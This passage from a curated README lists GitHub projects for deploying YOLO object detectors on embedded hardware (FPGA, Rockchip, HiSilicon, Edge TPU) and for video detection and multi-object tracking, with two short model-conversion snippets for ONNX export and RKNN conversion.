- [ceccocats/tkDNN](https://github.com/ceccocats/tkDNN) <img src="https://img.shields.io/github/stars/ceccocats/tkDNN?style=social"/> : Deep neural network library and toolkit to do high-performance inference on NVIDIA Jetson platforms. "A Systematic Assessment of Embedded Neural Networks for Object Detection". (**[IEEE ETFA 2020](https://ieeexplore.ieee.org/document/9212130)**)
- [Tengine](https://github.com/OAID/Tengine) <img src="https://img.shields.io/github/stars/OAID/Tengine?style=social"/> : Tengine is a lite, high-performance, modular inference engine for embedded devices.
- [Paddle Lite](https://github.com/paddlepaddle/paddle-lite) <img src="https://img.shields.io/github/stars/paddlepaddle/paddle-lite?style=social"/> : Multi-platform high-performance deep learning inference engine by PaddlePaddle.
- [DeployAI/nndeploy](https://github.com/DeployAI/nndeploy) <img src="https://img.shields.io/github/stars/DeployAI/nndeploy?style=social"/> : nndeploy is a cross-platform, high-performing, and straightforward AI model deployment framework. We strive to deliver a consistent and user-friendly experience across various inference frameworks in complex deployment environments, with a focus on performance.
- [yhwang-hub/dl_model_infer](https://github.com/yhwang-hub/dl_model_infer) <img src="https://img.shields.io/github/stars/yhwang-hub/dl_model_infer?style=social"/> : This is a C++ AI inference library. It currently supports inference for TensorRT models, with C++ inference for frameworks such as OpenVINO, NCNN and MNN planned. Pre- and post-processing come in both C++ and CUDA versions (the CUDA version is recommended), covering dynamic-batch image processing, inference, decoding and NMS for popular CV models.
- [hollance/YOLO-CoreML-MPSNNGraph](https://github.com/hollance/YOLO-CoreML-MPSNNGraph) <img src="https://img.shields.io/github/stars/hollance/YOLO-CoreML-MPSNNGraph?style=social"/> : Tiny YOLO for iOS implemented using CoreML but also using the new MPS graph API.
- [r4ghu/iOS-CoreML-Yolo](https://github.com/r4ghu/iOS-CoreML-Yolo) <img src="https://img.shields.io/github/stars/r4ghu/iOS-CoreML-Yolo?style=social"/> : Implementation of object detection with the Tiny YOLO v1 model on Apple's Core ML framework.
- [airockchip/rknn_model_zoo](https://github.com/airockchip/rknn_model_zoo) <img src="https://img.shields.io/github/stars/airockchip/rknn_model_zoo?style=social"/> : Rockchip Neural Network (RKNN) is a model format defined by Rockchip, based on its own NPU hardware architecture, to accelerate model inference; models in this format achieve far higher performance on the Rockchip NPU than on CPU/GPU.
- [LynxiTechnology/Lynxi-model-zoo](https://github.com/LynxiTechnology/Lynxi-model-zoo) <img src="https://img.shields.io/github/stars/LynxiTechnology/Lynxi-model-zoo?style=social"/> : Lynxi-model-zoo.
- ### FPGA TPU NPU Hardware Deployment #### FPGA TPU NPU 硬件部署

- ##### FPGA
- [Xilinx/Vitis-AI](https://github.com/Xilinx/Vitis-AI/tree/master/demo) <img src="https://img.shields.io/github/stars/Xilinx/Vitis-AI?style=social"/> : Vitis AI offers a unified set of high-level C++/Python programming APIs to run AI applications across edge-to-cloud platforms, including DPU for Alveo, and DPU for Zynq Ultrascale+ MPSoC and Zynq-7000. It brings the benefits to easily port AI applications from cloud to edge and vice versa. 10 samples in [VART Samples](https://github.com/Xilinx/Vitis-AI/tree/master/demo/VART) are available to help you get familiar with the unified programming APIs. [Vitis-AI-Library](https://github.com/Xilinx/Vitis-AI/tree/master/demo/Vitis-AI-Library) provides an easy-to-use and unified interface by encapsulating many efficient and high-quality neural networks.
- [tensil-ai/tensil](https://github.com/tensil-ai/tensil) <img src="https://img.shields.io/github/stars/tensil-ai/tensil?style=social"/> : Open source machine learning accelerators. [www.tensil.ai](https://www.tensil.ai/)
- [19801201/SpinalHDL_CNN_Accelerator](https://github.com/19801201/SpinalHDL_CNN_Accelerator) <img src="https://img.shields.io/github/stars/19801201/SpinalHDL_CNN_Accelerator?style=social"/> : CNN accelerator implemented with Spinal HDL.
- [dhm2013724/yolov2_xilinx_fpga](https://github.com/dhm2013724/yolov2_xilinx_fpga) <img src="https://img.shields.io/github/stars/dhm2013724/yolov2_xilinx_fpga?style=social"/> : YOLOv2 Accelerator in Xilinx's Zynq-7000 SoC (PYNQ-z2, Zedboard and ZCU102). (**[Master's thesis 2019](https://kns.cnki.net/KCMS/detail/detail.aspx?dbcode=CMFD&dbname=CMFDTEMP&filename=1019228234.nh&uid=WEEvREcwSlJHSldRa1FhdXNXaEhoOGhUTzA5T0tESzdFZ2pyR1NJR1ZBaz0=$9A4hF_YAuvQ5obgVAqNKPCYcEjKensW4IQMovwHtwkF4VYPoHbKxJw!!&v=MjE5NTN5dmdXN3JBVkYyNkY3RzZGdFBQcTVFYlBJUjhlWDFMdXhZUzdEaDFUM3FUcldNMUZyQ1VSTE9lWnVkdUY=), [电子技术应用 2019](https://kns.cnki.net/KCMS/detail/detail.aspx?dbcode=CJFQ&dbname=CJFDLAST2019&filename=DZJY201908009&uid=WEEvREcwSlJHSldRa1FhdXNXaEhoOGhUTzA5T0tESzdFZ2pyR1NJR1ZBaz0=$9A4hF_YAuvQ5obgVAqNKPCYcEjKensW4IQMovwHtwkF4VYPoHbKxJw!!&v=MDU0NDJDVVJMT2VadWR1Rnl2Z1c3ck1JVGZCZDdHNEg5ak1wNDlGYllSOGVYMUx1eFlTN0RoMVQzcVRyV00xRnI=), [计算机科学与探索 2019](https://kns.cnki.net/KCMS/detail/detail.aspx?dbcode=CJFQ&dbname=CJFDTEMP&filename=KXTS201910005&uid=WEEvREcwSlJHSldRa1FhdXNXaEhoOGhUTzA5T0tESzdFZ2pyR1NJR1ZBaz0=$9A4hF_YAuvQ5obgVAqNKPCYcEjKensW4IQMovwHtwkF4VYPoHbKxJw!!&v=MjkwNzdXTTFGckNVUkxPZVp1ZHVGeXZnVzdyT0xqWGZmYkc0SDlqTnI0OUZZWVI4ZVgxTHV4WVM3RGgxVDNxVHI=)**)
- [Yu-Zhewen/Tiny_YOLO_v3_ZYNQ](https://github.com/Yu-Zhewen/Tiny_YOLO_v3_ZYNQ) <img src="https://img.shields.io/github/stars/Yu-Zhewen/Tiny_YOLO_v3_ZYNQ?style=social"/> : Implement Tiny YOLO v3 on ZYNQ. "A Parameterisable FPGA-Tailored Architecture for YOLOv3-Tiny". (**[ARC 2020](https://link.springer.com/chapter/10.1007/978-3-030-44534-8_25)**)
- [HSqure/ultralytics-pt-yolov3-vitis-ai-edge](https://github.com/HSqure/ultralytics-pt-yolov3-vitis-ai-edge) <img src="https://img.shields.io/github/stars/HSqure/ultralytics-pt-yolov3-vitis-ai-edge?style=social"/> : This demo is only used for inference testing of Vitis AI v1.4 and quantitative compilation of the DPU. It is compatible with the training results of [ultralytics/yolov3](https://github.com/ultralytics/yolov3) v9.5.0 (it needs to use the model saving method of PyTorch v1.4).
- [mcedrdiego/Kria_yolov3_ppe](https://github.com/mcedrdiego/Kria_yolov3_ppe) <img src="https://img.shields.io/github/stars/mcedrdiego/Kria_yolov3_ppe?style=social"/> : Kria KV260 Real-Time Personal Protective Equipment Detection. "Deep Learning for Site Safety: Real-Time Detection of Personal Protective Equipment". (**[Automation in Construction 2020](https://www.sciencedirect.com/science/article/abs/pii/S0926580519308325)**)
- [xlsjdjdk/Ship-Detection-based-on-YOLOv3-and-KV260](https://github.com/xlsjdjdk/Ship-Detection-based-on-YOLOv3-and-KV260) <img src="https://img.shields.io/github/stars/xlsjdjdk/Ship-Detection-based-on-YOLOv3-and-KV260?style=social"/> : This is the entry project of the Xilinx Adaptive Computing Challenge 2021. It uses YOLOv3 for ship target detection in optical remote sensing images, and deploys the DPU on the KV260 platform to achieve hardware acceleration.
- [Pomiculture/YOLOv4-Vitis-AI](https://github.com/Pomiculture/YOLOv4-Vitis-AI) <img src="https://img.shields.io/github/stars/Pomiculture/YOLOv4-Vitis-AI?style=social"/> : Custom YOLOv4 for apple recognition (clean/damaged) on an Alveo U280 accelerator card using the Vitis AI framework.
- [mkshuvo2/ZCU104_YOLOv3_Post_Processing](https://github.com/mkshuvo2/ZCU104_YOLOv3_Post_Processing) <img src="https://img.shields.io/github/stars/mkshuvo2/ZCU104_YOLOv3_Post_Processing?style=social"/> : Tensor outputs from the Vitis AI Runner class for YOLOv3.
- [puffdrum/v4tiny_pt_quant](https://github.com/puffdrum/v4tiny_pt_quant) <img src="https://img.shields.io/github/stars/puffdrum/v4tiny_pt_quant?style=social"/> : Quantization for YOLO with xilinx/vitis-ai-pytorch.
- [chanshann/LITE_YOLOV3_TINY_VITISAI](https://github.com/chanshann/LITE_YOLOV3_TINY_VITISAI) <img src="https://img.shields.io/github/stars/chanshann/LITE_YOLOV3_TINY_VITISAI?style=social"/> : LITE_YOLOV3_TINY_VITISAI.
- [LukiBa/zybo_yolo](https://github.com/LukiBa/zybo_yolo) <img src="https://img.shields.io/github/stars/LukiBa/zybo_yolo?style=social"/> : YOLO example implementation using the Intuitus CNN accelerator on a ZYBO ZYNQ-7000 FPGA board.
- [matsuda-slab/YOLO_ZYNQ_MASTER](https://github.com/matsuda-slab/YOLO_ZYNQ_MASTER) <img src="https://img.shields.io/github/stars/matsuda-slab/YOLO_ZYNQ_MASTER?style=social"/> : Implementation of YOLOv3-tiny on FPGA.
- [FerberZhang/Yolov2-FPGA-CNN-](https://github.com/FerberZhang/Yolov2-FPGA-CNN-) <img src="https://img.shields.io/github/stars/FerberZhang/Yolov2-FPGA-CNN-?style=social"/> : A demo for accelerating YOLOv2 on Xilinx's PYNQ FPGA.
- [ChainZeeLi/FPGA_DPU](https://github.com/ChainZeeLi/FPGA_DPU) <img src="https://img.shields.io/github/stars/ChainZeeLi/FPGA_DPU?style=social"/> : This project implements YOLO v3 on a Xilinx FPGA with DPU.
- [xbdxwyh/yolov3_fpga_project](https://github.com/xbdxwyh/yolov3_fpga_project) <img src="https://img.shields.io/github/stars/xbdxwyh/yolov3_fpga_project?style=social"/> : yolov3_fpga_project.
- [ZLkanyo009/Yolo-compression-and-deployment-in-FPGA](https://github.com/ZLkanyo009/Yolo-compression-and-deployment-in-FPGA) <img src="https://img.shields.io/github/stars/ZLkanyo009/Yolo-compression-and-deployment-in-FPGA?style=social"/> : FPGA-based quantized face mask detection.
- [xiying-boy/yolov3-AX7350](https://github.com/xiying-boy/yolov3-AX7350) <img src="https://img.shields.io/github/stars/xiying-boy/yolov3-AX7350?style=social"/> : Driver files for HLS_YOLOV3.
- [himewel/yolowell](https://github.com/himewel/yolowell) <img src="https://img.shields.io/github/stars/himewel/yolowell?style=social"/> : A set of hardware architectures to build a co-design of convolutional neural network inference at FPGA devices.
- [embedeep/Free-TPU](https://github.com/embedeep/Free-TPU) <img src="https://img.shields.io/github/stars/embedeep/Free-TPU?style=social"/> : Free TPU for FPGA with Lenet, MobileNet, Squeezenet, Resnet, Inception V3, YOLO V3, and ICNet. Deep learning acceleration using Xilinx Zynq (Zedboard or ZC702) or Kintex-7 to solve image classification, detection, and segmentation problems.
- [yarakigit/design_contest_yolo_change_ps_to_pl](https://github.com/yarakigit/design_contest_yolo_change_ps_to_pl) <img src="https://img.shields.io/github/stars/yarakigit/design_contest_yolo_change_ps_to_pl?style=social"/> : Converts pytorch yolo format weights to C header files for bare-metal (FPGA implementation).
- [MasLiang/CNN-On-FPGA](https://github.com/MasLiang/CNN-On-FPGA) <img src="https://img.shields.io/github/stars/MasLiang/CNN-On-FPGA?style=social"/> : This is the code of a CNN on FPGA. At present it can only be used for reference, as some files are written coarsely using ISE.
- [adamgallas/fpga_accelerator_yolov3tiny](https://github.com/adamgallas/fpga_accelerator_yolov3tiny) <img src="https://img.shields.io/github/stars/adamgallas/fpga_accelerator_yolov3tiny?style=social"/> : fpga_accelerator_yolov3tiny.
- [ylk678910/tiny-yolov3-fpga](https://github.com/ylk678910/tiny-yolov3-fpga) <img src="https://img.shields.io/github/stars/ylk678910/tiny-yolov3-fpga?style=social"/> : Use an all-programmable SoC board to implement locating and tracking tasks. The hardware algorithm, a row-stationary-like strategy, can parallelize calculation and reduce the storage buffer area on the FPGA.
- [zhen8838/K210_Yolo_framework](https://github.com/zhen8838/K210_Yolo_framework) <img src="https://img.shields.io/github/stars/zhen8838/K210_Yolo_framework?style=social"/> : Yolo v3 framework based on tensorflow, supporting multiple models, multiple datasets, any number of output layers, any number of anchors, model pruning, and portable models for the K210!
- [SEASKY-Master/SEASKY_K210](https://github.com/SEASKY-Master/SEASKY_K210) <img src="https://img.shields.io/github/stars/SEASKY-Master/SEASKY_K210?style=social"/> : K210 PCB YOLO.
- [SEASKY-Master/Yolo-for-k210](https://github.com/SEASKY-Master/Yolo-for-k210) <img src="https://img.shields.io/github/stars/SEASKY-Master/Yolo-for-k210?style=social"/> : Yolo-for-k210.
- [TonyZ1Min/yolo-for-k210](https://github.com/TonyZ1Min/yolo-for-k210) <img src="https://img.shields.io/github/stars/TonyZ1Min/yolo-for-k210?style=social"/> : keras-yolo-for-k210.
- [vseasky/yolo-for-k210](https://github.com/vseasky/yolo-for-k210) <img src="https://img.shields.io/github/stars/vseasky/yolo-for-k210?style=social"/> : Yolo-for-k210.
- [InnoIPA/dpu-sc](https://github.com/InnoIPA/dpu-sc) <img src="https://img.shields.io/github/stars/innoipa/dpu-sc?style=social"/> : dpu-sc presents quick demos running AI inference (YOLOv4-Tiny, LPRNet) on the DPU with MPSoC.
- [InnoIPA/vaiGO](https://github.com/InnoIPA/vaiGo) <img src="https://img.shields.io/github/stars/innoipa/vaiGO?style=social"/> : vaiGO means Vitis-AI GO. It provides utilities and tutorials that make it easy to convert a trained AI model into a bitstream that can be deployed on an FPGA Edge AI Box.
- [InnoIPA/EXMU-X261-usermanual](https://github.com/InnoIPA/EXMU-X261-usermanual) <img src="https://img.shields.io/github/stars/innoipa/exmu-x261-usermanual?style=social"/> : We have built more defect detection solutions with YOLOv4-tiny on EXMU-X261.
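Most of the FPGA flows above (Vitis AI, Tensil, the Zynq accelerators) start from a frozen graph rather than a training checkpoint, so the usual first step is exporting the trained YOLO model to ONNX before vendor-specific quantization and compilation. A minimal sketch, assuming a PyTorch YOLOv5-style model from torch.hub; the file names, input size and opset are placeholders, and export details vary by model version:

```python
import torch

# autoshape=False loads the raw DetectionModel so it can be traced for export.
# Assumes weights are fetched from the ultralytics/yolov5 hub on first run.
model = torch.hub.load('ultralytics/yolov5', 'yolov5s', autoshape=False)
model.eval()

dummy = torch.zeros(1, 3, 640, 640)   # NCHW input; size depends on the target accelerator
torch.onnx.export(
    model, dummy, 'yolov5s.onnx',
    input_names=['images'], output_names=['preds'],
    opset_version=12,                 # older opsets are often safer for FPGA/NPU toolchains
)
```

The resulting ONNX file is what toolchains such as Vitis AI's quantizer or the Rockchip converter shown further below typically consume.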
- ##### Other Hardware
- [guichristmann/edge-tpu-tiny-yolo](https://github.com/guichristmann/edge-tpu-tiny-yolo) <img src="https://img.shields.io/github/stars/guichristmann/edge-tpu-tiny-yolo?style=social"/> : Run Tiny YOLO-v3 on Google's Edge TPU USB Accelerator.
- [Charlie839242/-Trash-Classification-Car](https://github.com/Charlie839242/-Trash-Classification-Car) <img src="https://img.shields.io/github/stars/Charlie839242/-Trash-Classification-Car?style=social"/> : A small car based on the yolo-fastest model; the main controller is an ART-Pi development board running the RT-Thread operating system.
- [Charlie839242/Deploy-yolo-fastest-tflite-on-raspberry](https://github.com/Charlie839242/Deploy-yolo-fastest-tflite-on-raspberry) <img src="https://img.shields.io/github/stars/Charlie839242/Deploy-yolo-fastest-tflite-on-raspberry?style=social"/> : This project deploys a yolo-fastest model as tflite on a Raspberry Pi 3B+.
- [mahxn0/Hisi3559A_Yolov5](https://github.com/mahxn0/Hisi3559A_Yolov5) <img src="https://img.shields.io/github/stars/mahxn0/Hisi3559A_Yolov5?style=social"/> : Full training and deployment workflow for yolov5 on the HiSilicon Hi3559A.
- [ZhenxinYUAN/YOLO_hi3516Deploy](https://github.com/ZhenxinYUAN/YOLO_hi3516Deploy) <img src="https://img.shields.io/github/stars/ZhenxinYUAN/YOLO_hi3516Deploy?style=social"/> : Deploy Yolo series algorithms on the HiSilicon hi3516 platform, including yolov3, yolov5, yolox, etc.
- [jveitchmichaelis/edgetpu-yolo](https://github.com/jveitchmichaelis/edgetpu-yolo) <img src="https://img.shields.io/github/stars/jveitchmichaelis/edgetpu-yolo?style=social"/> : Minimal-dependency Yolov5 export and inference demonstration for the Google Coral EdgeTPU.
- [xiaqing10/Hisi_YoLoV5](https://github.com/xiaqing10/Hisi_YoLoV5) <img src="https://img.shields.io/github/stars/xiaqing10/Hisi_YoLoV5?style=social"/> : Running yolov5 on the HiSilicon NNIE.
- [BaronLeeLZP/hi3516dv300_nnie-yolov3-demo](https://github.com/BaronLeeLZP/hi3516dv300_nnie-yolov3-demo) <img src="https://img.shields.io/github/stars/BaronLeeLZP/hi3516dv300_nnie-yolov3-demo?style=social"/> : On the HiSilicon Hi3516DV300 chip, using the NNIE and OpenCV libraries, this demo simplifies the complex nested calls and builds of the official yolov3 sample and can be cross-compiled and deployed to run on the board.
- [OpenVINO-dev-contest/YOLOv7_OpenVINO](https://github.com/OpenVINO-dev-contest/YOLOv7_OpenVINO) <img src="https://img.shields.io/github/stars/OpenVINO-dev-contest/YOLOv7_OpenVINO?style=social"/> : This repository demonstrates how to deploy an official YOLOv7 pre-trained model with the OpenVINO runtime API.
- [Zhou-sx/yolov5_Deepsort_rknn](https://github.com/Zhou-sx/yolov5_Deepsort_rknn) <img src="https://img.shields.io/github/stars/Zhou-sx/yolov5_Deepsort_rknn?style=social"/> : Track vehicles and persons on rk3588 / rk3399pro.
- [littledeep/YOLOv5-RK3399Pro](https://github.com/littledeep/YOLOv5-RK3399Pro) <img src="https://img.shields.io/github/stars/littledeep/YOLOv5-RK3399Pro?style=social"/> : PyTorch-->ONNX-->RKNN.
- [jnulzl/YOLOV5_RK1126](https://github.com/jnulzl/YOLOV5_RK1126) <img src="https://img.shields.io/github/stars/jnulzl/YOLOV5_RK1126?style=social"/> : YOLOv5 C++ code for the RK1126.
- [Qengineering/YoloCam](https://github.com/Qengineering/YoloCam) <img src="https://img.shields.io/github/stars/Qengineering/YoloCam?style=social"/> : Raspberry Pi stand-alone AI-powered camera with live feed, email notification, Gdrive storage and event-triggered GPIO.
- [Applied-Deep-Learning-Lab/Yolov5_RK3588](https://github.com/Applied-Deep-Learning-Lab/Yolov5_RK3588) <img src="https://img.shields.io/github/stars/Applied-Deep-Learning-Lab/Yolov5_RK3588?style=social"/> : Yolov5_RK3588.
- [LSH9832/edgeyolo](https://github.com/LSH9832/edgeyolo) <img src="https://img.shields.io/github/stars/LSH9832/edgeyolo?style=social"/> : an edge-real-time anchor-free object detector with decent performance.
- [liuyuan000/Rv1126_YOLOv5-Lite](https://github.com/liuyuan000/Rv1126_YOLOv5-Lite) <img src="https://img.shields.io/github/stars/liuyuan000/Rv1126_YOLOv5-Lite?style=social"/> : Deploying YOLOv5-Lite on the RV1126.
- [cqu20160901/yolov10_rknn_Cplusplus](https://github.com/cqu20160901/yolov10_rknn_Cplusplus) <img src="https://img.shields.io/github/stars/cqu20160901/yolov10_rknn_Cplusplus?style=social"/> : On-board C++ deployment of yolov10 with Rockchip RKNN on the RK3588 platform.
- [cqu20160901/yolov10_onnx_rknn_horizon_tensorRT](https://github.com/cqu20160901/yolov10_onnx_rknn_horizon_tensorRT) <img src="https://img.shields.io/github/stars/cqu20160901/yolov10_onnx_rknn_horizon_tensorRT?style=social"/> : yolov10 object detection deployment versions for easy porting across platforms (onnx, tensorRT, rknn, Horizon), claimed to be the simplest and fastest deployment route.
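The Rockchip entries above follow a common conversion pattern: take an exported ONNX model, quantize it against a calibration set, and emit an `.rknn` blob for the NPU. A minimal sketch, assuming rknn-toolkit2's `RKNN` API; the paths, normalization values and target platform are placeholders:

```python
from rknn.api import RKNN

rknn = RKNN()
# Preprocessing is baked into the converted model; values depend on training setup.
rknn.config(mean_values=[[0, 0, 0]], std_values=[[255, 255, 255]],
            target_platform='rk3588')
rknn.load_onnx(model='yolov5s.onnx')
# dataset.txt lists calibration images used for INT8 quantization.
rknn.build(do_quantization=True, dataset='./dataset.txt')
rknn.export_rknn('yolov5s.rknn')
rknn.release()
```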
## Applications

- ### Video Object Detection #### 视频目标检测
- [YOLOV](https://github.com/YuHengsss/YOLOV) <img src="https://img.shields.io/github/stars/YuHengsss/YOLOV?style=social"/> : "YOLOV: Making Still Image Object Detectors Great at Video Object Detection". (**[arXiv 2022](https://arxiv.org/abs/2208.09686)**)
- [StreamYOLO](https://github.com/yancie-yjr/StreamYOLO) <img src="https://img.shields.io/github/stars/yancie-yjr/StreamYOLO?style=social"/> : "Real-time Object Detection for Streaming Perception". (**[CVPR 2022](https://arxiv.org/abs/2203.12338v1)**)
- [REPP](https://github.com/AlbertoSabater/Robust-and-efficient-post-processing-for-video-object-detection) <img src="https://img.shields.io/github/stars/AlbertoSabater/Robust-and-efficient-post-processing-for-video-object-detection?style=social"/> : "Robust and efficient post-processing for video object detection". (**[IROS 2020](https://ieeexplore.ieee.org/abstract/document/9341600)**)
- [NoScope](https://github.com/stanford-futuredata/noscope) <img src="https://img.shields.io/github/stars/stanford-futuredata/noscope?style=social"/> : "Noscope: optimizing neural network queries over video at scale". (**[arXiv 2017](https://arxiv.org/abs/1703.02529)**)
- ### Object Tracking #### 目标跟踪
- #### Multi-Object Tracking ##### 多目标跟踪
- [sujanshresstha/YOLOv10_DeepSORT](https://github.com/sujanshresstha/YOLOv10_DeepSORT) <img src="https://img.shields.io/github/stars/sujanshresstha/YOLOv10_DeepSORT?style=social"/> : This repository contains code for object detection and tracking in videos using the YOLOv10 object detection model and the DeepSORT algorithm.
- [mikel-brostrom/yolo_tracking](https://github.com/mikel-brostrom/yolo_tracking) <img src="https://img.shields.io/github/stars/mikel-brostrom/yolo_tracking?style=social"/> : BoxMOT: pluggable SOTA tracking modules for segmentation, object detection and pose estimation models.
- [mikel-brostrom/Yolov7_StrongSORT_OSNet](https://github.com/mikel-brostrom/Yolov7_StrongSORT_OSNet) <img src="https://img.shields.io/github/stars/mikel-brostrom/Yolov7_StrongSORT_OSNet?style=social"/> : Real-time multi-camera multi-object tracker using [YOLOv7](https://github.com/WongKinYiu/yolov7) and [StrongSORT](https://github.com/dyhBUPT/StrongSORT) with [OSNet](https://github.com/KaiyangZhou/deep-person-reid).
- [RizwanMunawar/yolov8-object-tracking](https://github.com/RizwanMunawar/yolov8-object-tracking) <img src="https://img.shields.io/github/stars/RizwanMunawar/yolov8-object-tracking?style=social"/> : YOLOv8 Object Tracking Using PyTorch, OpenCV and Ultralytics.
- [xuarehere/yolo_series_deepsort_pytorch](https://github.com/xuarehere/yolo_series_deepsort_pytorch) <img src="https://img.shields.io/github/stars/xuarehere/yolo_series_deepsort_pytorch?style=social"/> : Deepsort with the yolo series. This project supports existing YOLO detection models (YOLOv3, YOLOv4, YOLOv4Scaled, YOLOv5, YOLOv6, YOLOv7, YOLOv8, YOLOX, YOLOR, PPYOLOE).
- [JackWoo0831/Yolov7-tracker](https://github.com/JackWoo0831/Yolov7-tracker) <img src="https://img.shields.io/github/stars/JackWoo0831/Yolov7-tracker?style=social"/> : YOLOv7 and several multi-object trackers (SORT, DeepSORT, ByteTrack, BoT-SORT, etc.) on the VisDrone2019 dataset. It uses a unified style and integrated tracker for easy embedding in your own projects.
- [BoT-SORT](https://github.com/NirAharon/BoT-SORT) <img src="https://img.shields.io/github/stars/NirAharon/BoT-SORT?style=social"/> : "BoT-SORT: Robust Associations Multi-Pedestrian Tracking". (**[arXiv 2022](https://arxiv.org/abs/2206.14651)**)
- [StrongSORT](https://github.com/dyhBUPT/StrongSORT) <img src="https://img.shields.io/github/stars/dyhBUPT/StrongSORT?style=social"/> : "StrongSORT: Make DeepSORT Great Again". (**[arXiv 2022](https://arxiv.org/abs/2202.13514)**)
- [UAVMOT](https://github.com/LiuShuaiyr/UAVMOT) <img src="https://img.shields.io/github/stars/LiuShuaiyr/UAVMOT?style=social"/> : "Multi-Object Tracking Meets Moving UAV". (**[CVPR 2022](https://openaccess.thecvf.com/content/CVPR2022/html/Liu_Multi-Object_Tracking_Meets_Moving_UAV_CVPR_2022_paper.html)**)
- [HKPolyU-UAV/AUTO](https://github.com/HKPolyU-UAV/AUTO) <img src="https://img.shields.io/github/stars/HKPolyU-UAV/AUTO?style=social"/> : "Dynamic Object Tracking on Autonomous UAV System for Surveillance Applications". (**[Sensors 2021](https://www.mdpi.com/1424-8220/21/23/7888)**)
- [bharath5673/StrongSORT-YOLO](https://github.com/bharath5673/StrongSORT-YOLO) <img src="https://img.shields.io/github/stars/bharath5673/StrongSORT-YOLO?style=social"/> : Real-time multi-camera multi-object tracker using (YOLOv5, YOLOv7) and [StrongSORT](https://github.com/dyhBUPT/StrongSORT) with OSNet.
- [kadirnar/yolov5-strongsort](https://github.com/kadirnar/yolov5-strongsort) <img src="https://img.shields.io/github/stars/kadirnar/yolov5-strongsort?style=social"/> : Minimal PyTorch implementation of YOLOv5 and [StrongSORT](https://github.com/dyhBUPT/StrongSORT).
- [ZQPei/deep_sort_pytorch](https://github.com/ZQPei/deep_sort_pytorch) <img src="https://img.shields.io/github/stars/ZQPei/deep_sort_pytorch?style=social"/> : MOT using deepsort and yolov3 with pytorch.
- [Qidian213/deep_sort_yolov3](https://github.com/Qidian213/deep_sort_yolov3) <img src="https://img.shields.io/github/stars/Qidian213/deep_sort_yolov3?style=social"/> : Real-time multi-person tracker using YOLO v3 and deep_sort with tensorflow.
- [CSTrack](https://github.com/JudasDie/SOTS) <img src="https://img.shields.io/github/stars/JudasDie/SOTS?style=social"/> : "Rethinking the competition between detection and ReID in Multi-Object Tracking". (**[arXiv 2020](https://arxiv.org/abs/2010.12138)**)
- [ROLO](https://github.com/Guanghan/ROLO) <img src="https://img.shields.io/github/stars/Guanghan/ROLO?style=social"/> : ROLO is short for Recurrent YOLO, aimed at simultaneous object detection and tracking.
- [FastMOT](https://github.com/GeekAlexis/FastMOT) <img src="https://img.shields.io/github/stars/GeekAlexis/FastMOT?style=social"/> : "FastMOT: High-Performance Multiple Object Tracking Based on Deep SORT and KLT". (**[Zenodo 2020](https://doi.org/10.5281/zenodo.4294717)**)
- [Sharpiless/Yolov5-deepsort-inference](https://github.com/Sharpiless/Yolov5-deepsort-inference) <img src="https://img.shields.io/github/stars/Sharpiless/Yolov5-deepsort-inference?style=social"/> : Vehicle and pedestrian tracking and counting with YOLOv5 + Deepsort; the code is wrapped into a Detector class that is easy to embed in your own projects.
- [Sharpiless/Yolov5-Deepsort](https://github.com/Sharpiless/Yolov5-Deepsort) <img src="https://img.shields.io/github/stars/Sharpiless/Yolov5-Deepsort?style=social"/> : The latest yolov5 + deepsort object detection and tracking; it can display target classes and supports training on your own dataset with version 5.0.
- [LeonLok/Multi-Camera-Live-Object-Tracking](https://github.com/LeonLok/Multi-Camera-Live-Object-Tracking) <img src="https://img.shields.io/github/stars/LeonLok/Multi-Camera-Live-Object-Tracking?style=social"/> : Multi-camera live traffic and object counting with YOLO v4, Deep SORT, and Flask.
- [LeonLok/Deep-SORT-YOLOv4](https://github.com/LeonLok/Deep-SORT-YOLOv4) <img src="https://img.shields.io/github/stars/LeonLok/Deep-SORT-YOLOv4?style=social"/> : People detection and optional tracking with Tensorflow backend.
- [obendidi/Tracking-with-darkflow](https://github.com/obendidi/Tracking-with-darkflow) <img src="https://img.shields.io/github/stars/obendidi/Tracking-with-darkflow?style=social"/> : Real-time people multitracker using YOLO v2 and deep_sort with tensorflow.
- [DrewNF/Tensorflow_Object_Tracking_Video](https://github.com/DrewNF/Tensorflow_Object_Tracking_Video) <img src="https://img.shields.io/github/stars/DrewNF/Tensorflow_Object_Tracking_Video?style=social"/> : Object Tracking in Tensorflow (Localization Detection Classification), developed to participate in the ImageNet VID competition.
- [dyh/unbox_yolov5_deepsort_counting](https://github.com/dyh/unbox_yolov5_deepsort_counting) <img src="https://img.shields.io/github/stars/dyh/unbox_yolov5_deepsort_counting?style=social"/> : Pedestrian and vehicle tracking, detection and counting with yolov5 + deepsort.
- [theAIGuysCode/yolov3_deepsort](https://github.com/theAIGuysCode/yolov3_deepsort) <img src="https://img.shields.io/github/stars/theAIGuysCode/yolov3_deepsort?style=social"/> : Object tracking implemented with YOLOv3, Deep Sort and Tensorflow.
- [weixu000/libtorch-yolov3-deepsort](https://github.com/weixu000/libtorch-yolov3-deepsort) <img src="https://img.shields.io/github/stars/weixu000/libtorch-yolov3-deepsort?style=social"/> : libtorch-yolov3-deepsort.
- [pmj110119/YOLOX_deepsort_tracker](https://github.com/pmj110119/YOLOX_deepsort_tracker) <img src="https://img.shields.io/github/stars/pmj110119/YOLOX_deepsort_tracker?style=social"/> : using yolox+deepsort for object-tracking.
- [abhyantrika/nanonets_object_tracking](https://github.com/abhyantrika/nanonets_object_tracking) <img src="https://img.shields.io/github/stars/abhyantrika/nanonets_object_tracking?style=social"/> : nanonets_object_tracking.
- [mattzheng/keras-yolov3-KF-objectTracking](https://github.com/mattzheng/keras-yolov3-KF-objectTracking) <img src="https://img.shields.io/github/stars/mattzheng/keras-yolov3-KF-objectTracking?style=social"/> : Multi-person object tracking with keras-yolov3 as the detector and a Kalman filter as the tracker.
- [rohanchandra30/TrackNPred](https://github.com/rohanchandra30/TrackNPred) <img src="https://img.shields.io/github/stars/rohanchandra30/TrackNPred?style=social"/> : A Software Framework for End-to-End Trajectory Prediction.
- [RichardoMrMu/yolov5-deepsort-tensorrt](https://github.com/RichardoMrMu/yolov5-deepsort-tensorrt) <img src="https://img.shields.io/github/stars/RichardoMrMu/yolov5-deepsort-tensorrt?style=social"/> : A C++ implementation of yolov5 and deepsort.
- [bamwani/car-counting-and-speed-estimation-yolo-sort-python](https://github.com/bamwani/car-counting-and-speed-estimation-yolo-sort-python) <img src="https://img.shields.io/github/stars/bamwani/car-counting-and-speed-estimation-yolo-sort-python?style=social"/> : This project implements: 1. vehicle counting, 2. lane detection, 3. lane change detection and 4. speed estimation.
